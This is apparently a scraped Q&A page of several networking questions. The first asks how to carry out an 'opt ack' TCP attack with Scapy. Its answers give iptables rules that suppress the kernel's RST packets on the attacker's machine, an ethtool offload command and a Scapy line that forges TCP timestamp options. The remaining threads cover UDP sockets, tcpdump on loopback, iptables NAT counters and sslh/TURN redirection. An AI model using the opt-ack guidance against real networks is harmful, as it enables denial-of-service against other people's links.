how can i play tcp traffic between 2 hosts from a pcap file without triggering the kernel networking? - sockets

Im trying to implement an "opt ack" attack
this attack involves sending ack packets before the packets arrive thus increasing the tcp windows and creating a big load on the network channel.
im using scapy to record traffic between a client and a server
and then i send the client ack packets one after one
i have two problems:
i need to shut down the kernel sending packets automatically
(it makes the attacker send reset packets)
also i need to fix the timestamp and checksum
can you help me with at least the first problem?

The first problem (RESET packets) can be fixed by installing iptables rules. It worked really well for me in my implementation of packet replay.
iptables -A OUTPUT -p tcp -d "DST IP ADDR" --sport "SRC PORT" --tcp-flags RST RST -j DROP

The kernel has no knowledge of segments sent by Scapy, it doesn't have a socket bound to the port you are using (see here) so it sends RST segments as an answer to the ACK segments.
You can add an iptable rule to drop these on the attacker's machine:
iptables -A OUTPUT -p tcp --tcp-flags RST RST -s source_ip -j DROP
If you change segments, Scapy will recompute checksums before resending it.
Note that invalid checksums when recording trafic could be caused by checksum offload on your machine and can be solved with ethtool command:
ethtool --offload ethX rx off tx off
For the timestamps, I assume you are talking about TCP Timestamps option. You can forge them before resending the segment with Scapy TCP options:
ACK = IP(...)/TCP(..., options=[("Timestamp", (TS_value, TS_ecr))])

Related

Purported UDP "connection"

My understanding was that UDP doesn't form connections; it just blindly sends packets. However, when I run
nc -u -l 10002
and
nc -u 127.0.0.1 10002
simultaneously (and so can send messages back and forth between terminals), lsof reports two open UDP connections:
nc ... UDP localhost:10002->localhost:35311
nc ... UDP localhost:35311->localhost:10002
If I open a third terminal and do nc -u 127.0.0.1 10002 again, to send another message to the original listener, the listener does not receive (or acknowledge, at least) the message, suggesting it is indeed tied to a specific connection.
If I implement a UDP echo server in Java like this and do sorta the same thing (on 10001), I get
java ... UDP *:10001
nc ... UDP localhost:52295->localhost:10001
aka, Java is just listening on 10001, but nc has formed a connection.
Based on my understanding of UDP, I'd expect both sides to behave like the Java version. What's going on? Can I make the Java version do whatever nc is doing? Is there a benefit to doing so?
I'm on Ubuntu 20.04.3 LTS.
UDP sockets can be connected (after a call to connect) or they can be unconnected. In the first case the socket can only exchange data with the connected peer, while in the second case it can exchange data with arbitrary peers. What you see in lsof is if the socket is connected or not.
My understanding was that UDP doesn't form connections; it just blindly sends packets.
That's a different meaning of the term connection here. TCP has always "real" connections, i.e. an association between two endpoints which has a clear start (SYN based handshake) and end (FIN based teardown). TCP sockets used for data exchange are therefor always connected.
UDP can have associations between two endpoints too, i.e. it can have connected sockets. There is no explicit setup and teardown of such a connection though. And UDP sockets don't need to be connected. From looking at the traffic it can therefore not be determined if connected UDP sockets are in use or unconnected.
Can I make the Java version do whatever nc is doing?
Yes, see What does Java's UDP DatagramSocket.connect() do?
.
Is there a benefit to doing so?
An unconnected UDP socket will receive data from any peer and the application has to check for each received datagram where they came from and if they should be accepted. A connected UDP socket will only receive data from the connected peer, i.e. no checks in the application are needed to check this.
Apart from that it might scale better if different sockets are used for communication with different peers. But if only few packets are exchanged with each peer and/or if one need to communicate with lots of peers at the same time, then using multiple connected sockets instead of a single unconnected one might mean too much overhead.

Why does tcpdump on the loopback interface only capture half the packets received by the filter?

I am trying to understand why when using tcpdump on the loopback interface, only half of the packets received by the filter are captured.
But when I run the exact same traffic and do tcpdump on the eth0 interface all the traffic is captured.
In both cases I am targeting specific ports with the traffic and for the tcpdump.
I spotted a similar question on here why tcpdump captures on half the packets
And the suggestion was that it was filtering duplicates sent and received by/at the interface. They were looking at the whole interface and not singling out specific ports. Here this does not appear to be the case, as I am using the dump on specific ports, with the source and destination ports for the traffic being different. Also looking the eth0 with the same traffic, I can see the all the captured packets that are being received by both the lo and eth0 filters.
For example I send 10 udp packets to both eth0 and lo, I get the following:
tcpdump -i eth0 udp port xxxx
10 packets captured
10 packets received by filter
0 packets dropped by kernel
tcpdump -i lo udp port xxxx
5 packets captured
10 packets received by filter
0 packets dropped by kernel
So it looks like tcpdump is filtering traffic only for the loopback, possibly grabbing every second packet. The timestamps seem to indicate this, as if I am sending packets at a rate of 1 packet per second, on the eth0 I see the packets captured occur at 1 second intervals. While on lo, the packets captured occur at 2 second intervals.
Is there some default configuration for tcpdump on a loopback that causes it filter every second packet?
Or am I misunderstanding something? It seems strange that tcpdump would operate differently depending on the interface choosen.

iptables: packet counter behavior for MASQUERADE rule

I noticed a "strange" behavior of the packet counter for POSTROUTING chain (MASQUERADE rule) in my "router" (CentOS 7), that when I ping the outside from
the NATed LAN, the pkts fields does not increase as many as the ping requests I sent.
For example, if I send 10 ICMP echo requests using ping <dest-ip> -c 10, the pkts field in POSTROUTING chain only increase by 1. If I ping one packet by one packet (i.e., issue multiple ping -c 1 <dest-ip> commands), the pkts field usually increases as expected (if the time gap between consecutive ping command is longer enough).
Chain POSTROUTING (policy ACCEPT 50 packets, 3302 bytes)
pkts bytes target prot opt in out source destination
63 4696 MASQUERADE all -- * eth0 172.16.1.0/24 0.0.0.0/0
For the same ping test, I watched the pkts field in both PREROUTING and FORWARD chain. The counter behavior is the same for PREROUTING and POSTROUTING chains, but the FORWARD chain has a "normal" behavior that the counter will increase exactly as the number of ICMP packets I sent.
Using Wireshark to capture ICMP packages at both client and the "router", it shows that the ICMP request/reply communication matches the ping command.
I guess I missed some knowledge about this particular packet counter behavior...can you please indicate the source of information on this?
Thanks a lot.

How to redirect and load balance locally generated packets through iptables?

Here is the scenario I am working on.
I have sslh listening on 443 which redirects https traffic to 445 and TURN traffic to 3478. I also have 6 TURN servers listening on 3478 to 3483. I wish to load balance the incoming TURN traffic across all these ports. I tried load balancing through the PREROUTING chain of the nat table but it didnt work since sslh is a local process and packets generated form it skips the PREROUTING table. I can see these packets coming from sslh in the OUTPUT chain of the nat table but I am unable to redirect them to another port.
Here is the rule i am using.
iptables -t nat -A OUTPUT -p tcp -o lo --dport 3478 -j REDIRECT --to-ports 3479
which is not working. Any help is highly appreciated!
Try to use loadbalance in coturn. So option:
alternate-server
An example in coturn source https://github.com/coturn/coturn/blob/master/examples/scripts/loadbalance/master_relay.sh
I missed to add the transparency rules for sslh. After adding these rules,I was able to redirect the packets to a different ports

tcpdump to capture error IP Flags packets

I am using:
# tcpdump -i gphy -vv -B 28000 -s 120 -w log.pcap tcp portrange 10032-10001
to capture packets which I sent out from a host, and I notice all the packets with IP flags altered are missing, is there away to capture all packets even if IP flags is not correctly programmed ?
This non deterministic behaviour could occur due to multiple potential reasons, such as incorrectly setting the 'Do Not Fragment' bit in IP flags, which may result in the packet being dropped. Perhaps you should ensure that you've correctly set the IP flags field to check whether the packet is being sent. If it is being sent (and not being dropped during transmission), with the given command you should be able to capture all packets (provided they match the filter).